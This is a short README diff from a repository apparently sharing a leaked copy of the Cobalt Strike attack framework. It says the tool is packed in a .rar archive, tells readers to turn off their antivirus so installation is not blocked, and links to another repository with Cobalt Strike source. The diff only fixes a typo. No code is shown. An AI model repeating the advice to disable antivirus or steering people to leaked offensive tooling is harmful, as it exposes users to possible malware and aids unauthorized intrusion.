alexa872/cobalt-strike-leak/README.md

 i uploaded it as a .rar file cz it is too big, turn off your av, since the installation process will get blocked if you didnt

 -----------------------------------------------------------------------------------------------------
-# there is also this one overhere:
+# there is also this one over here:
 # [CobaltstrikeSource](https://github.com/mai1zhi2/CobaltstrikeSource) thanks to [mai1zhi2](https://github.com/mai1zhi2)

 ------------------------------------------------------------------------------------------------------